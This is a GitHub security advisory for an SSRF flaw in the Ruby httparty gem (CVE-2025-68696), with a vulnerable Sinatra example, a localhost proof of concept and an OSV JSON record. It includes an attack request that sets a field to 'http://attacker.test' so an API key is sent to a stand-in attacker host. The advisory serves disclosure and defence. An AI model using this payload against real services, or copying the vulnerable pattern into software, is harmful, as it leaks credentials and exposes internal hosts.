ghsa-hm5p-x4rq-38w4
Vulnerability from github
Summary
There may be an SSRF vulnerability in httparty. This issue can pose a risk of leaking API keys, and it can also allow third parties to issue requests to internal servers.
Details
When httparty receives a path argument that is an absolute URL, it ignores the base_uri field. As a result, if a malicious user can control the path value, the application may unintentionally communicate with a host that the programmer did not anticipate.
Consider the following example of a web application:
```rb require 'sinatra' require 'httparty'
class RepositoryClient include HTTParty base_uri 'http://exmaple.test/api/v1/repositories/' headers 'X-API-KEY' => '1234567890' end
post '/issue' do request_body = JSON.parse(request.body.read) RepositoryClient.get(request_body['repository_id']).body # do something json message: 'OK' end ```
Now, suppose an attacker sends a request like this:
``` POST /issue HTTP/1.1 Host: localhost:10000 Content-Type: application/json
{ "repository_id": "http://attacker.test", "title": "test" } ```
In this case, httparty sends the X-API-KEY not to http://example.test but instead to http://attacker.test.
A similar problem was reported and fixed in the HTTP client library axios in the past:
https://github.com/axios/axios/issues/6463
Also, Python's urljoin function has documented a warning about similar behavior:
https://docs.python.org/3.13/library/urllib.parse.html#urllib.parse.urljoin
PoC
Follow these steps to reproduce the issue:
- Set up two simple HTTP servers.
bash
mkdir /tmp/server1 /tmp/server2
echo "this is server1" > /tmp/server1/index.html
echo "this is server2" > /tmp/server2/index.html
python -m http.server -d /tmp/server1 10001 &
python -m http.server -d /tmp/server2 10002 &
- Create a script (for example,
main.rb):
```rb require 'httparty'
class Client include HTTParty base_uri 'http://localhost:10001' end
data = Client.get('http://localhost:10002').body puts data ```
- Run the script:
bash
$ ruby main.rb
this is server2
Although base_uri is set to http://localhost:10001/, httparty sends the request to http://localhost:10002/.
Impact
- Leakage of credentials: If an absolute URL is provided, any API keys or credentials configured in httparty may be exposed to unintended third-party hosts.
- SSRF (Server-Side Request Forgery): Attackers can force the httparty-based program to send requests to other internal hosts within the network where the program is running.
- Affected users: Any software that uses
base_uriand does not properly validate the path parameter may be affected by this issue.
{
"affected": [
{
"package": {
"ecosystem": "RubyGems",
"name": "httparty"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "0.23.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-68696"
],
"database_specific": {
"cwe_ids": [
"CWE-918"
],
"github_reviewed": true,
"github_reviewed_at": "2025-12-23T19:31:10Z",
"nvd_published_at": "2025-12-23T23:15:45Z",
"severity": "HIGH"
},
"details": "## Summary\n\nThere may be an SSRF vulnerability in httparty. This issue can pose a risk of leaking API keys, and it can also allow third parties to issue requests to internal servers.\n\n## Details\n\nWhen httparty receives a path argument that is an absolute URL, it ignores the `base_uri` field. As a result, if a malicious user can control the path value, the application may unintentionally communicate with a host that the programmer did not anticipate.\n\nConsider the following example of a web application:\n\n```rb\nrequire \u0027sinatra\u0027\nrequire \u0027httparty\u0027\n\nclass RepositoryClient\n include HTTParty\n base_uri \u0027http://exmaple.test/api/v1/repositories/\u0027\n headers \u0027X-API-KEY\u0027 =\u003e \u00271234567890\u0027\nend\n\npost \u0027/issue\u0027 do\n request_body = JSON.parse(request.body.read)\n RepositoryClient.get(request_body[\u0027repository_id\u0027]).body\n # do something\n json message: \u0027OK\u0027\nend\n```\n\nNow, suppose an attacker sends a request like this:\n\n```\nPOST /issue HTTP/1.1\nHost: localhost:10000\nContent-Type: application/json\n\n{\n \"repository_id\": \"http://attacker.test\",\n \"title\": \"test\"\n}\n```\n\nIn this case, httparty sends the `X-API-KEY` not to `http://example.test` but instead to `http://attacker.test`.\n\nA similar problem was reported and fixed in the HTTP client library axios in the past: \n\u003chttps://github.com/axios/axios/issues/6463\u003e\n\nAlso, Python\u0027s `urljoin` function has documented a warning about similar behavior: \n\u003chttps://docs.python.org/3.13/library/urllib.parse.html#urllib.parse.urljoin\u003e\n\n## PoC\n\nFollow these steps to reproduce the issue:\n\n1. Set up two simple HTTP servers.\n\n ```bash\n mkdir /tmp/server1 /tmp/server2\n echo \"this is server1\" \u003e /tmp/server1/index.html \n echo \"this is server2\" \u003e /tmp/server2/index.html\n python -m http.server -d /tmp/server1 10001 \u0026\n python -m http.server -d /tmp/server2 10002 \u0026\n ```\n\n2. Create a script (for example, `main.rb`):\n\n ```rb\n require \u0027httparty\u0027\n\n class Client\n include HTTParty\n base_uri \u0027http://localhost:10001\u0027\n end\n\n data = Client.get(\u0027http://localhost:10002\u0027).body\n puts data\n ```\n\n3. Run the script:\n\n ```bash\n $ ruby main.rb\n this is server2\n ```\n\nAlthough `base_uri` is set to `http://localhost:10001/`, httparty sends the request to `http://localhost:10002/`.\n\n\n## Impact\n\n- Leakage of credentials: If an absolute URL is provided, any API keys or credentials configured in httparty may be exposed to unintended third-party hosts. \n- SSRF (Server-Side Request Forgery): Attackers can force the httparty-based program to send requests to other internal hosts within the network where the program is running. \n- Affected users: Any software that uses `base_uri` and does not properly validate the path parameter may be affected by this issue.",
"id": "GHSA-hm5p-x4rq-38w4",
"modified": "2025-12-26T17:25:12Z",
"published": "2025-12-23T19:31:10Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/jnunemaker/httparty/security/advisories/GHSA-hm5p-x4rq-38w4"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68696"
},
{
"type": "WEB",
"url": "https://github.com/jnunemaker/httparty/commit/0529bcd6309c9fd9bfdd50ae211843b10054c240"
},
{
"type": "PACKAGE",
"url": "https://github.com/jnunemaker/httparty"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:P",
"type": "CVSS_V4"
}
],
"summary": "httparty Has Potential SSRF Vulnerability That Leads to API Key Leakage"
}
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.